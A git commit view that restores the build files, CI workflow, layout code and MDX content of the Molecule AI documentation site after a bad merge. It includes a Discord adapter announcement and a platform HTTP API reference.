fix: restore build infrastructure deleted by bad PR #59 merge

[Molecule-Platform-Evolvement-Manager]

PR #59 (commit dae42e2) was merged ~2 weeks ago with a bad diff that
deleted all Next.js/Fumadocs build files (package.json, app/, lib/,
source.config.ts, tsconfig.json, etc.) and most MDX content pages.
This broke the Vercel build, taking doc.moleculesai.app offline.

Root cause: the PR branch was likely rebased or reset to a state that
only contained the marketing/ subtree, so the merge diff showed
deletions for every other file.

This commit:
1. Restores all build infrastructure from the last good commit (86fa0e9)
2. Restores 25 deleted MDX content pages (concepts, quickstart, etc.)
3. Adds frontmatter (title) to 55 .md files added post-bad-merge that
   were missing the required YAML frontmatter for Fumadocs
4. Removes duplicate quickstart.mdx (superseded by quickstart.md)
5. Adds CI workflow (.github/workflows/ci.yml) to catch build failures
   on PRs before merge — this would have prevented the outage

Build verified: 99 static pages generated successfully.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
rabbitblood 2026-04-22 14:03:24 -07:00
parent d8aaca8e7b
commit 40bd0cfdde
98 changed files with 11870 additions and 0 deletions

17
.github/workflows/ci.yml vendored Normal file
View File

@ -0,0 +1,17 @@
# CI: build the docs site on every push / pull request targeting main so a
# broken build is caught before merge (this check would have prevented the
# PR #59 outage described in the commit message).
name: CI

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Node 20 with the npm cache keyed off package-lock.json.
      - uses: actions/setup-node@v4
        with:
          node-version: 20
          cache: npm
      # `npm ci` enforces a clean, lockfile-exact install.
      - run: npm ci
      - run: npm run build

58
.gitignore vendored Normal file
View File

@ -0,0 +1,58 @@
# dependencies
/node_modules
/.pnp
.pnp.*
.yarn/*
!.yarn/patches
!.yarn/plugins
!.yarn/releases
!.yarn/versions

# testing
/coverage

# next.js
/.next/
/out/

# fumadocs generated source
/.source/

# production
/build

# misc
.DS_Store
*.pem

# debug
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*

# env files — `.env.*` already covers `.env.local` / `.env.*.local`, which
# were previously listed as separate (redundant) entries; example files are
# explicitly re-allowed below.
.env
.env*.local
.env.*
!.env.example
!.env.sample

# typescript
*.tsbuildinfo
next-env.d.ts

# IDE
.vscode/
.idea/

# credentials — added by chore/credentials-gitignore batch
*.key
*.crt
*.p12
*.pfx
.secrets/
.auth-token
.auth_token

7
app/(home)/layout.tsx Normal file
View File

@ -0,0 +1,7 @@
import { HomeLayout } from 'fumadocs-ui/layouts/home';
import type { ReactNode } from 'react';
import { baseOptions } from '@/app/layout.config';

/** Wraps the landing pages in the shared Fumadocs home chrome. */
export default function Layout(props: { children: ReactNode }) {
  const { children } = props;
  return <HomeLayout {...baseOptions}>{children}</HomeLayout>;
}

29
app/(home)/page.tsx Normal file
View File

@ -0,0 +1,29 @@
import Link from 'next/link';

// Tailwind class lists for the two calls to action, hoisted so the JSX
// below stays readable. Strings are unchanged from the original markup.
const primaryCta =
  'rounded-md bg-fd-primary px-5 py-2.5 text-sm font-medium text-fd-primary-foreground transition-colors hover:opacity-90';
const secondaryCta =
  'rounded-md border border-fd-border px-5 py-2.5 text-sm font-medium transition-colors hover:bg-fd-muted';

/** Landing page: headline, one-paragraph pitch, and docs/GitHub links. */
export default function HomePage() {
  return (
    <main className="flex flex-1 flex-col items-center justify-center px-6 py-24 text-center">
      <h1 className="mb-4 text-5xl font-bold tracking-tight sm:text-6xl">
        Molecule AI
      </h1>
      <p className="mb-8 max-w-2xl text-lg text-fd-muted-foreground">
        Build and run multi-agent organisations. Templates, plugins, channels,
        and the runtime that ties them together documented end to end.
      </p>
      <div className="flex flex-wrap items-center justify-center gap-3">
        <Link href="/docs" className={primaryCta}>
          Read the docs
        </Link>
        <Link
          href="https://github.com/Molecule-AI/molecule-monorepo"
          className={secondaryCta}
        >
          View on GitHub
        </Link>
      </div>
    </main>
  );
}

10
app/api/search/route.ts Normal file
View File

@ -0,0 +1,10 @@
import { NextResponse } from 'next/server';

// Stubbed search endpoint that always answers with an empty result list.
// Rationale: fumadocs' createFromSource / createSearchAPI crash on v15.8
// ("a.map is not a function") during static page collection, so this keeps
// the route alive and the site building. Restore the fumadocs search API
// once the upstream fix lands.
const NO_RESULTS: never[] = [];

export function GET() {
  return NextResponse.json(NO_RESULTS);
}

View File

@ -0,0 +1,48 @@
import { source } from '@/lib/source';
import {
DocsBody,
DocsDescription,
DocsPage,
DocsTitle,
} from 'fumadocs-ui/page';
import { notFound } from 'next/navigation';
import { getMDXComponents } from '@/mdx-components';
// Force static generation for every docs route.
export const dynamic = 'force-static';

/**
 * Renders a single docs page resolved from the catch-all slug.
 * 404s (via notFound) when the slug does not map to a source page.
 */
export default async function Page(props: {
  params: Promise<{ slug?: string[] }>;
}) {
  const { slug } = await props.params;
  const page = source.getPage(slug);
  if (!page) notFound();

  const Body = page.data.body;
  return (
    <DocsPage toc={page.data.toc ?? []} full={page.data.full}>
      <DocsTitle>{page.data.title}</DocsTitle>
      <DocsDescription>{page.data.description}</DocsDescription>
      <DocsBody>
        <Body components={getMDXComponents()} />
      </DocsBody>
    </DocsPage>
  );
}
// Enumerate every docs slug at build time; combined with
// `dynamic = 'force-static'` above, all docs pages are pre-rendered.
export function generateStaticParams() {
return source.generateParams();
}
/** Per-page <head> metadata (title/description) from the page frontmatter. */
export async function generateMetadata(props: {
  params: Promise<{ slug?: string[] }>;
}) {
  const { slug } = await props.params;
  const page = source.getPage(slug);
  if (!page) notFound();

  const { title, description } = page.data;
  return { title, description };
}

13
app/docs/layout.tsx Normal file
View File

@ -0,0 +1,13 @@
import { DocsLayout } from 'fumadocs-ui/layouts/docs';
import type { ReactNode } from 'react';
import { baseOptions } from '@/app/layout.config';
import { source } from '@/lib/source';

/** Docs shell: sidebar tree derived from the content source + shared nav. */
export default function Layout(props: { children: ReactNode }) {
  return (
    <DocsLayout tree={source.pageTree} {...baseOptions}>
      {props.children}
    </DocsLayout>
  );
}

3
app/global.css Normal file
View File

@ -0,0 +1,3 @@
@import 'tailwindcss';
@import 'fumadocs-ui/css/neutral.css';
@import 'fumadocs-ui/css/preset.css';

7
app/layout.config.tsx Normal file
View File

@ -0,0 +1,7 @@
import type { BaseLayoutProps } from 'fumadocs-ui/layouts/shared';

// Layout options shared by the home and docs layouts (both spread
// `...baseOptions` into their Fumadocs layout components).
export const baseOptions: BaseLayoutProps = {
nav: {
title: 'Molecule AI',
},
};

28
app/layout.tsx Normal file
View File

@ -0,0 +1,28 @@
import './global.css';
import { RootProvider } from 'fumadocs-ui/provider/next';
import { Inter } from 'next/font/google';
import type { ReactNode } from 'react';
// Self-hosted Inter via next/font — no runtime request to Google Fonts.
const inter = Inter({
subsets: ['latin'],
});
// Site-wide metadata. Child pages interpolate into the `%s` title template;
// metadataBase resolves relative OG/canonical URLs against the prod domain.
export const metadata = {
title: {
default: 'Molecule AI Documentation',
template: '%s | Molecule AI Docs',
},
description:
'Build and run multi-agent organisations on the Molecule AI platform. Templates, plugins, channels, and the runtime that ties them together.',
metadataBase: new URL('https://doc.moleculesai.app'),
};
/** Root layout: global font, Fumadocs RootProvider, full-height flex body. */
export default function Layout(props: { children: ReactNode }) {
  const { children } = props;
  return (
    <html lang="en" className={inter.className} suppressHydrationWarning>
      <body className="flex flex-col min-h-screen">
        <RootProvider>{children}</RootProvider>
      </body>
    </html>
  );
}

View File

@ -0,0 +1,80 @@
---
title: "Your AI Agents, Live in Discord: Discord Adapter Ships on Molecule AI"
description: "Molecule AI's Discord adapter connects AI agent workspaces to Discord servers via slash commands and webhooks — no polling, no bot token management, no separate setup required beyond a webhook URL."
publishedAt: 2026-04-21
tags: [channels, discord, integrations, platform]
---
The same question that comes up every time someone deploys an AI agent team: *can we talk to it from where our team already communicates?*
For many teams, that place is Discord. Not as a notification sink — as a working interface. Teams run standups, triage issues, and coordinate deployments in Discord channels. The idea of switching to a web UI or a separate tool to interact with an agent feels like a step backward.
Molecule AI's Discord adapter makes that unnecessary.
## How the Discord Adapter Works
The adapter connects an AI agent workspace to a Discord channel using two standard Discord features: **Incoming Webhooks** (for outbound messages) and **Discord Interactions** (for inbound slash commands).
**Setup is minimal.** You provide a Discord Incoming Webhook URL — the one that Discord generates when you add a webhook to any channel. That's it. No bot creation in the Developer Portal, no OAuth flow, no Gateway setup. The webhook URL encodes the channel and bot credentials, so a single URL is all the adapter needs to send and receive.
On the inbound side, Discord delivers slash command interactions as signed JSON POSTs to your Interactions endpoint. The adapter parses the interaction, reconstructs the slash command as text (`/ask what's our deployment status`), and passes it to the agent as a standard inbound message.
On the outbound side, the agent's response is sent back to the same Discord channel via the webhook. Messages longer than 2000 characters are automatically split at word boundaries.
## Slash Commands as the Interface
Discord bots in guilds can only read messages they have specific permissions for. The Discord adapter sidesteps this entirely by using **slash commands** as the only inbound interface.
Users invoke the agent by typing a slash command:
```
/ask what's our current deployment status?
/ask any open incidents?
/ask summarize the last 24 hours of test results
```
The command name and options are extracted from the Discord Interactions payload and reconstructed as plain text for the agent. The agent's response goes back to the same channel via the webhook.
This means:
- No message reading permissions required
- No rate limit concerns from polling
- Clean, deliberate interaction model — users invoke the agent explicitly
## How It Fits Into the Agent Hierarchy
A Discord channel connected to a workspace becomes part of the agent hierarchy like any other channel. The Community Manager agent can be the primary interface — it receives the slash command, routes it to the right sub-agent (Security Auditor, QA Engineer, PM), and returns the answer to Discord.
```
Discord server
↓ slash command
Community Manager (Molecule AI workspace)
↓ delegate_task
Security Auditor / QA Engineer / PM
↓ response
Discord channel ← answer
```
The routing is invisible to the Discord user. They see a single response from the Community Manager, with the sub-agent delegation happening entirely within the Molecule AI platform.
## Connecting to Canvas
The Discord adapter is managed from the **Channels** tab in Canvas, alongside Telegram and other social channels. From there you can:
- Connect a Discord channel with a webhook URL
- Set an allowlist of Discord user IDs or roles (optional — empty means allow everyone)
- Send a test message to verify the connection
- View channel status and message counts
The adapter also works via API: `POST /workspaces/:id/channels` with `channel_type: "discord"` and the webhook URL in the config.
## Security Notes
Discord Interactions payloads are verified at the router layer before reaching the adapter — requests without a valid signature are rejected before any parsing occurs.
Webhook URLs contain embedded credentials and are stored masked in the database. Error messages throughout the adapter intentionally do not wrap the full webhook URL to prevent credentials leaking into logs or error responses.
## What's Next
Discord is the third platform adapter, following Telegram. Slack and WhatsApp are next on the roadmap.
If you're already running Molecule AI agents and want to connect a Discord server, the Channels tab in Canvas is where to start. The adapter is live now.

View File

@ -1,3 +1,6 @@
---
title: "Hermes Adapter — Shell Design Spec"
---
# Hermes Adapter — Shell Design Spec
**Perspective:** DevOps Engineer + Backend Engineer

View File

@ -1,3 +1,6 @@
---
title: "Hermes Adapter — Implementation Plan"
---
# Hermes Adapter — Implementation Plan
**Author:** Dev Lead

View File

@ -1,3 +1,6 @@
---
title: "Hermes Agent — Adapter Reconnaissance"
---
# Hermes Agent — Adapter Reconnaissance
Reconnaissance of [NousResearch/hermes-agent](https://github.com/NousResearch/hermes-agent) (v0.8.0, 68,713 ⭐, MIT) for potential Molecule AI adapter integration.

View File

@ -1,3 +1,6 @@
---
title: "MeDo Integration Design — Molecule AI Hackathon (May 20 2026)"
---
# MeDo Integration Design — Molecule AI Hackathon (May 20 2026)
**Status:** Design — implementation pending operator sign-off on open questions (§5).

View File

@ -1,3 +1,6 @@
---
title: "MeDo Smoke Test Log — 2026-04-13 (Run 4)"
---
# MeDo Smoke Test Log — 2026-04-13 (Run 4)
**Tester:** PM (direct execution)

View File

@ -1,3 +1,6 @@
---
title: "ADR-001: Admin endpoints accept any workspace bearer token"
---
# ADR-001: Admin endpoints accept any workspace bearer token
**Status:** Accepted — known risk, Phase-H remediation planned

View File

@ -1,3 +1,6 @@
---
title: "Agent Card"
---
# Agent Card
Every workspace publishes an Agent Card at `/.well-known/agent-card.json`. This is a standard A2A document that describes the workspace's identity, capabilities, and how to communicate with it.

View File

@ -1,3 +1,6 @@
---
title: "Bundle System"
---
# Bundle System
A workspace bundle is the portable unit of the platform. It is a single `.bundle.json` file that captures everything needed to recreate a workspace anywhere.

View File

@ -1,3 +1,6 @@
---
title: "Agent Runtime Adapters"
---
# Agent Runtime Adapters
## Overview

View File

@ -1,3 +1,6 @@
---
title: "Config Format (config.yaml)"
---
# Config Format (config.yaml)
Each workspace type has a `config.yaml` that defines its personality — the model, skills, tools, and settings.

View File

@ -1,3 +1,6 @@
---
title: "Skills"
---
# Skills
A skill is a package that gives an agent knowledge, instructions, and optionally executable tools. Skills are the primary way to customize what a workspace agent can do.

View File

@ -1,3 +1,6 @@
---
title: "Social Channels"
---
# Social Channels
Connect AI agent workspaces to social platforms (Telegram, Slack, Discord) so users can talk to agents from anywhere. Built on a pluggable adapter pattern — one channel per workspace, multiple chats per channel.

View File

@ -1,3 +1,6 @@
---
title: "System Prompt Structure"
---
# System Prompt Structure
When a workspace agent starts (or rebuilds its prompt), the system prompt is assembled in a specific order: **specific to general** — the agent's own identity first, then what it can do, then what it can delegate.

View File

@ -1,3 +1,6 @@
---
title: "Team Expansion (Recursive Workspaces)"
---
# Team Expansion (Recursive Workspaces)
When a workspace is expanded into a team, it gains sub-workspaces while its own agent remains as the **team lead** (coordinator). This is recursive — sub-workspaces can themselves be expanded into teams, infinitely deep.

View File

@ -1,3 +1,6 @@
---
title: "A2A Protocol (Inter-Workspace Communication)"
---
# A2A Protocol (Inter-Workspace Communication)
Workspaces talk to each other **directly** via A2A (Agent-to-Agent protocol) — the platform is not in the message path.

View File

@ -1,3 +1,6 @@
---
title: "Communication Rules"
---
# Communication Rules
The hierarchy IS the topology. There is no manual connection wiring — communication is derived automatically from the parent/child structure.

View File

@ -1,3 +1,6 @@
---
title: "Platform API (Go Backend)"
---
# Platform API (Go Backend)
The Go backend is Molecule AI's control plane. It does not execute agent reasoning itself. It manages the infrastructure and coordination around workspaces.

View File

@ -1,3 +1,6 @@
---
title: "Registry & Heartbeat"
---
# Registry & Heartbeat
Every workspace registers with the platform on startup and sends a heartbeat every 30 seconds. This is how the platform knows which workspaces are alive and where to find them.

View File

@ -1,3 +1,6 @@
---
title: "WebSocket Events"
---
# WebSocket Events
The canvas subscribes to the platform's WebSocket at `/ws` and receives real-time structure events as JSON messages.

View File

@ -0,0 +1,754 @@
---
title: API Reference
description: Complete reference for all Molecule AI Platform HTTP and WebSocket endpoints.
---
# API Reference
The Molecule AI Platform exposes a REST API (default port 8080) for workspace management, agent registry, communication, and administration. All endpoints return JSON unless otherwise noted.
<Callout type="warn">
**Breaking changes — PR #701 (2026-04-17)**
- **`PATCH /workspaces/:id` now requires authentication.** Previously, requests without a bearer token could update cosmetic fields (name, x/y position). All `PATCH` calls now require `Authorization: Bearer <workspace-token>` or receive **401 Unauthorized**.
- **`GET /templates` and `GET /org/templates` now require AdminAuth.** Unauthenticated callers receive **401 Unauthorized**.
- **All `/workspaces/:id` endpoints validate the `:id` path parameter** as a UUID. Non-UUID values return **400 Bad Request** before any database interaction.
**Migration:** add `Authorization: Bearer <workspace-token>` to all `PATCH /workspaces/:id` calls. Use an admin bearer token for `GET /templates` and `GET /org/templates`. Ensure `:id` values in automation scripts are valid UUIDs.
</Callout>
**Base URL:** `http://localhost:8080` (self-hosted) or `https://api.moleculesai.app` (SaaS)
---
## Authentication Model
The platform uses three authentication middleware variants depending on the sensitivity of the route.
### AdminAuth
Strict bearer-token authentication. Required for any route where a forged request could leak prompts/memory, create/mutate workspaces, or leak operational data.
```
Authorization: Bearer <token>
```
**Fail-open behavior:** When no live tokens exist globally (fresh install), AdminAuth passes all requests through. Once the first token is created, all AdminAuth routes require a valid bearer.
### WorkspaceAuth
Per-workspace bearer token binding. Workspace A's token cannot access workspace B's sub-routes. Used for the entire `/workspaces/:id/*` group (except the A2A proxy, which uses `CanCommunicate`).
```
Authorization: Bearer <workspace-token>
```
### CanvasOrBearer
Accepts either a valid bearer token OR a request whose `Origin` header matches `CORS_ORIGINS`. Used only for cosmetic-only routes where a forged request has zero data/security impact.
Currently applies only to `PUT /canvas/viewport`. Do not extend to data-sensitive routes.
---
## Health and Monitoring
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/health` | None | Returns `200 OK` if the platform is running. Use for load balancer health checks. |
| GET | `/metrics` | None | Prometheus text format (v0.0.4) metrics. Scrape-safe, no auth required. |
| GET | `/admin/liveness` | AdminAuth | Per-subsystem `supervised.Snapshot()` ages. Check before debugging stuck scheduler/heartbeat goroutines. |
---
## Workspaces
Core workspace CRUD and lifecycle operations.
### CRUD
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces` | AdminAuth | Create a new workspace. Accepts `name`, `runtime`, `template`, `parent_id`, `tier`, `workspace_dir`, and other fields. Runtime is auto-detected from template config if omitted (defaults to `langgraph`). |
| GET | `/workspaces` | AdminAuth | List all workspaces with status, runtime, agent card, position, and hierarchy info. |
| GET | `/workspaces/:id` | WorkspaceAuth | Get a single workspace by ID. |
| PATCH | `/workspaces/:id` | WorkspaceAuth | Update workspace fields. A workspace bearer token is always required — unauthenticated calls return 401. Validates field constraints: `name` ≤ 255 chars, `role` ≤ 1,000 chars, `model` and `runtime` ≤ 100 chars each; `name` and `role` must not contain newlines (`\n`, `\r`) or YAML-special characters (`{}[]|>*&!`). Oversized or invalid field values return 400. `:id` must be a valid UUID. Financial fields (`budget_limit`) are not accepted here — use `PATCH /workspaces/:id/budget` (AdminAuth). |
| DELETE | `/workspaces/:id` | AdminAuth | Delete a workspace. Stops the container, revokes all auth tokens, and removes all associated data. |
### Lifecycle
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/restart` | WorkspaceAuth | Restart the workspace container. Sends a `restart_context` A2A message after successful re-registration. |
| POST | `/workspaces/:id/pause` | WorkspaceAuth | Stop the container and set status to `paused`. Paused workspaces skip health sweep, liveness monitor, and auto-restart. Resume manually via `/resume`. |
| POST | `/workspaces/:id/resume` | WorkspaceAuth | Re-provision a paused workspace. Status transitions to `provisioning`. |
| POST | `/workspaces/:id/hibernate` | WorkspaceAuth | Immediately hibernate a workspace (stop container, set status to `hibernated`). Useful for manual cost control. See hibernation note below. |
<Callout type="info">
**Workspace hibernation**
A workspace with `hibernation_idle_minutes` set in its config will be **automatically hibernated** by the platform after that many idle minutes (no active tasks, no recent heartbeat). The monitor checks every 2 minutes.
`hibernated` differs from `paused`:
- **`paused`** — manual, resumes only via `POST /resume`.
- **`hibernated`** — automatic (or via `POST /hibernate`), resumes **automatically** when an A2A message arrives.
When a message is sent to a hibernated workspace, the platform returns:
```
HTTP 503
Retry-After: 15
{"waking": true}
```
Callers should retry after ~15 seconds. The workspace typically returns to `online` within that window.
To opt a workspace into auto-hibernation, add to its `config.yaml`:
```yaml
hibernation_idle_minutes: 30 # hibernate after 30 min idle; null (default) = disabled
```
**Atomic hibernation guarantee:** The platform uses a single atomic SQL claim (`UPDATE … WHERE active_tasks = 0`) before stopping the container. If a task arrives between the idle check and the container stop, the claim fails and hibernation is aborted — no in-flight tasks are silently lost.
</Callout>
### Budget
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/budget` | AdminAuth | Read a workspace's current spend and ceiling. Returns `budget_limit`, `monthly_spend`, and `budget_remaining` (all in USD cents). |
| PATCH | `/workspaces/:id/budget` | AdminAuth | Set or clear a workspace's monthly spend ceiling. Body: `{ "budget_limit": N }` (positive integer, USD cents) or `{ "budget_limit": null }` to remove the cap. Negative values → 400. Returns same shape as GET. |
**Request / response shape:**
```json
// PATCH request body
{ "budget_limit": 500 } // $5.00/month ceiling
{ "budget_limit": null } // no ceiling
// GET and PATCH success response (200)
{
"budget_limit": 500, // null when no ceiling
"monthly_spend": 312, // accumulated spend this period, USD cents
"budget_remaining": 188 // null when no ceiling; max(0, limit-spend) — can be negative
}
```
<Callout type="warn">
**`budget_limit` and `monthly_spend` are absent from `GET /workspaces/:id`**
Financial fields are stripped unconditionally from the workspace detail
response — they do not appear for any caller, authenticated or not. Always
use `GET /workspaces/:id/budget` (AdminAuth) to read spend data.
`budget_limit` is also **not** accepted on the general `PATCH /workspaces/:id`
endpoint. Use the dedicated `/budget` route.
</Callout>
<Callout type="info">
**Enforcement and fail-open behaviour**
When `monthly_spend >= budget_limit`, `POST /workspaces/:id/a2a` returns:
```
HTTP 402 Payment Required
{"error": "workspace budget limit exceeded"}
```
Channel sends (Slack, Telegram, Discord, Lark) are also budget-gated with
the same 402 response. The workspace itself is **not paused** — it keeps
running; only inbound A2A and channel traffic is blocked.
**Fail-open:** if the budget check encounters a DB error, traffic is allowed
through rather than blocked. The spend ceiling is a soft guardrail, not a
hard guarantee.
</Callout>
---
## Registry
Workspace registration and heartbeat endpoints. Called by workspace runtimes, not by end users.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/registry/register` | None | Register a workspace with the platform. Sets status to `online`. Body includes agent URL, agent card, capabilities. |
| POST | `/registry/heartbeat` | Bearer (if token exists) | Send a heartbeat. Updates Redis TTL key (60s expiry). Body can include `active_tasks`, `current_task`, `error_rate`. Triggers `degraded` status if `error_rate > 0.5`. |
| POST | `/registry/update-card` | Bearer (if token exists) | Update the workspace's agent card (name, description, skills, etc.). |
---
## Discovery
Peer discovery and access control verification.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/registry/discover/:id` | Bearer + `X-Workspace-ID` | Discover a workspace's agent card and URL. Requires caller identification. Fails open on DB hiccup since hierarchy check is primary. |
| GET | `/registry/:id/peers` | Bearer + `X-Workspace-ID` | List all peers (siblings, parent, children) that the caller can communicate with. |
| POST | `/registry/check-access` | None | Check whether two workspaces can communicate. Body: `{ "caller_id": "...", "target_id": "..." }`. Returns `{ "allowed": true/false }`. |
---
## Communication
### A2A Proxy
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/a2a` | CanCommunicate | Proxy an A2A JSON-RPC message to the target workspace. Caller identified via `X-Workspace-ID` header. Canvas requests (no header) bypass access check. On connection error, checks if container is dead and triggers auto-restart. |
### Delegation
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/delegate` | WorkspaceAuth | Async fire-and-forget delegation. Supports idempotency keys. Body includes target workspace, prompt, and metadata. |
| GET | `/workspaces/:id/delegations` | WorkspaceAuth | List delegation status for a workspace. Returns delegation rows with status, result, timestamps. |
---
## Configuration
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/config` | WorkspaceAuth | Get the workspace's `config.yaml` contents. |
| PATCH | `/workspaces/:id/config` | WorkspaceAuth | Update the workspace config. "Save & Restart" writes config and auto-restarts; "Save" writes only and shows a restart banner in the Canvas. |
---
## Secrets
### Per-Workspace Secrets
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/secrets` | WorkspaceAuth | List secret keys for a workspace (keys only, values masked). |
| POST | `/workspaces/:id/secrets` | WorkspaceAuth | Set a secret `{ "key": "...", "value": "..." }`. Auto-restarts the workspace. |
| PUT | `/workspaces/:id/secrets` | WorkspaceAuth | Alias for POST (upsert semantics). Auto-restarts the workspace. |
| DELETE | `/workspaces/:id/secrets/:key` | WorkspaceAuth | Delete a secret by key. Auto-restarts the workspace. |
| GET | `/workspaces/:id/model` | WorkspaceAuth | Return the model configuration derived from available API keys (which provider keys are set). |
### Global Secrets
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/settings/secrets` | AdminAuth | List global secrets (keys only, values masked). |
| PUT | `/settings/secrets` | AdminAuth | Set a global secret `{ "key": "...", "value": "..." }`. Auto-restarts every non-paused/non-removed workspace that does not shadow the key with a workspace-level override. |
| POST | `/settings/secrets` | AdminAuth | Alias for PUT. |
| DELETE | `/settings/secrets/:key` | AdminAuth | Delete a global secret. Same auto-restart fan-out as PUT. |
Legacy aliases `GET/POST/DELETE /admin/secrets[/:key]` also exist and behave identically.
---
## Memory
### Key-Value Memory
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/memory` | WorkspaceAuth | List all key-value memory entries for a workspace. |
| POST | `/workspaces/:id/memory` | WorkspaceAuth | Set a memory entry `{ "key": "...", "value": "..." }`. |
| DELETE | `/workspaces/:id/memory/:key` | WorkspaceAuth | Delete a memory entry by key. |
### Agent Memories (HMA-scoped)
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/memories` | WorkspaceAuth | List or search agent memories. Supports `?q=` for semantic search (see below). |
| POST | `/workspaces/:id/memories` | WorkspaceAuth | Create an agent memory entry. |
| DELETE | `/workspaces/:id/memories/:id` | WorkspaceAuth | Delete an agent memory by ID. |
#### Semantic search (`?q=`)
When a platform-level embedding function is configured, passing `?q=<text>`
on `GET /workspaces/:id/memories` triggers vector similarity search instead of
the default full-text / ILIKE path:
```
GET /workspaces/{id}/memories?q=authentication+flow&limit=10
Authorization: Bearer {token}
```
Matching entries are returned **ordered by cosine similarity** (most similar
first). Each row includes an additional `similarity_score` field (0–1, higher
is closer):
```json
[
{
"id": "mem_abc123",
"key": "auth-design",
"value": "We use short-lived JWTs issued by the platform and refreshed via /auth/token.",
"similarity_score": 0.91,
"created_at": "2026-04-10T14:22:00Z"
}
]
```
**Graceful fallback**: if no embedding function is configured, or if the
embedding call fails for a given query, the platform falls back transparently
to the text-search path. The `similarity_score` field is absent in fallback
responses. You do not need to change client code to handle both modes.
---
## Files
Workspace file management. Files are stored in the workspace's config directory.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/files` | WorkspaceAuth | List files in the workspace config directory. |
| GET | `/workspaces/:id/files/*path` | WorkspaceAuth | Read a specific file. |
| PUT | `/workspaces/:id/files/*path` | WorkspaceAuth | Write a file. Creates parent directories as needed. |
| DELETE | `/workspaces/:id/files/*path` | WorkspaceAuth | Delete a file. |
| GET | `/workspaces/:id/shared-context` | WorkspaceAuth | Get the shared context files for a workspace (aggregated from parent hierarchy). |
---
## Activity
Activity logging and search for A2A communications, task updates, and agent logs.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/activity` | WorkspaceAuth | List activity logs for a workspace. Supports `?source=canvas` or `?source=agent` filter, and `?type=delegation` for A2A topology overlay polling. |
| POST | `/workspaces/:id/activity` | WorkspaceAuth | Log an activity entry (used by workspace runtimes to self-report). |
| POST | `/workspaces/:id/notify` | WorkspaceAuth | Agent-to-user push message via WebSocket. Delivers a notification to connected Canvas clients. |
---
## Audit Ledger
Tamper-evident audit trail for workspace events. Used by the Canvas Audit Trail panel.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/audit` | WorkspaceAuth | List audit entries for a workspace. Supports `?event_type=delegation\|decision\|gate\|hitl`, `?cursor=<cursor>`, and `?limit=<n>` (default 50). |
### Audit entry schema
| Field | Type | Description |
|-------|------|-------------|
| `id` | string | Unique entry ID |
| `event_type` | string | `delegation`, `decision`, `gate`, or `hitl` |
| `actor` | string | Workspace ID that generated the event |
| `summary` | string | Human-readable event description |
| `chain_valid` | bool | `false` if the entry's hash does not match the prior chain — indicates possible tampering |
| `created_at` | string (ISO 8601) | Event timestamp |
| `cursor` | string \| null | Opaque pagination cursor; `null` when there are no more entries |
Example response:
```json
{
"entries": [
{
"id": "aud_xyz789",
"event_type": "delegation",
"actor": "ws_abc123",
"summary": "Delegated task 'fix CI' to Backend Engineer",
"chain_valid": true,
"created_at": "2026-04-17T14:05:00Z"
}
],
"cursor": "eyJpZCI6ImF1ZF94eXo3ODkifQ"
}
```
### Session Search
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/session-search` | WorkspaceAuth | Search activity logs with filters for type, date range, and text content. Returns paginated results. |
---
## Workflow Checkpoints
Step-level progress persistence for long-running Temporal workflows. Workspaces with `runtime: langgraph` (Temporal) automatically save a checkpoint after each of the three workflow stages (`task_receive`, `llm_call`, `task_complete`) and resume from the last completed stage on restart.
<Callout type="info">
**Automatic resume behavior (runtime: langgraph only)**
When a Temporal workspace restarts mid-workflow, the runtime reads the highest-index checkpoint and sets `resume_from_step` accordingly. Already-completed stages are skipped — the agent picks up exactly where it left off without re-running earlier steps.
Checkpoint I/O is non-fatal: network errors are silently swallowed. A crashed or unreachable platform never prevents the agent from running.
</Callout>
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/checkpoints` | WorkspaceAuth | Upsert a step checkpoint. Body: `{ "workflow_id": "...", "step_name": "task_receive\|llm_call\|task_complete", "step_index": 0, "payload": {...} }`. Uses `ON CONFLICT DO UPDATE` — safe to call multiple times. |
| GET | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Return all checkpoints for a workflow, ordered by `step_index DESC`. Returns 404 if no checkpoints exist for the workflow. |
| DELETE | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Clear all checkpoints for a workflow. Called by the runtime on clean task completion. Returns 404 if none exist. |
**Step names and indices:**
| Step | `step_index` | Meaning |
|------|-------------|---------|
| `task_receive` | 0 | Task received from A2A message |
| `llm_call` | 1 | LLM inference completed |
| `task_complete` | 2 | Task result sent back to caller |
---
## Schedules
Cron-based scheduled tasks per workspace.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/schedules` | WorkspaceAuth | List all schedules for a workspace. |
| POST | `/workspaces/:id/schedules` | WorkspaceAuth | Create a schedule. Body: `{ "expression": "0 */6 * * *", "timezone": "UTC", "prompt": "...", "enabled": true }`. |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Update a schedule (expression, timezone, prompt, enabled). |
